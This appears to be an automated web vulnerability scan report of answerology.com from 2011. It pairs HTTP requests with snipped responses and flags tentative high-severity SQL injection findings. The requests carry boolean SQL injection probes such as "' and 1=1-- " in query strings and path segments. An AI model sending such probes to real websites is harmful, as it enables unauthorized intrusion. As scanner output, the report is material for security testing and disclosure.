GET /varw/getPromo?conId Host: syn.verticalacuity.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Sat, 17 Sep 2011 16:32:03 GMT Server: nginx Content-Length: 1392 Connection: keep-alive (function() { var BASE_URL = 'http://syn.vertical var dataVar = 'recData' || 'data'; var data = {"baseUrl":"http://syn if(!window.VAData){window })(); |
GET /varw/getPromo?conId Host: syn.verticalacuity.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Sat, 17 Sep 2011 16:32:04 GMT Expires: Thu, 01-Jan-1970 00:00:00 GMT Server: nginx Set-Cookie: JSESSIONID=wz5uxs7uk Content-Length: 1392 Connection: keep-alive (function() { var BASE_URL = 'http://syn.vertical var dataVar = 'recData' || 'data'; var data = {"baseUrl":"http://syn if(!window.VAData){window })(); |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | / |
GET /?1%20and%201%3d1--%20=1 HTTP/1.1 Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:27:27 GMT Content-Length: 58819 Connection: close Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Relationship Advice - Get Answers to Relationship Questions</title> <meta name=" ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /?1%20and%201%3d2--%20=1 HTTP/1.1 Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:27:27 GMT Content-Length: 58840 Connection: close Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Relationship Advice - Get Answers to Relationship Questions</title> <meta name=" ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/cosmogirl |
GET /cobrands'%20and%201%3d1--%20/cosmogirl/Cosmogirl Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:50 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /cobrands'%20and%201%3d2--%20/cosmogirl/Cosmogirl Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:50 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/cosmopolitan |
GET /cobrands'%20and%201%3d1--%20/cosmopolitan/Cosmop Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:46 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /cobrands'%20and%201%3d2--%20/cosmopolitan/Cosmop Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:46 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/cosmopolitan |
GET /cobrands/cosmopolitan Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:55 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /cobrands/cosmopolitan Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:55 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/goodhousek |
GET /cobrands/goodhousek Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:55 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /cobrands/goodhousek Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:56 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cobrands/marieclaire |
GET /cobrands/marieclaire'%20and%201%3d1--%20/MarieClaireLayout.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:49 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /cobrands/marieclaire'%20and%201%3d2--%20/MarieClaireLayout.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:49 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
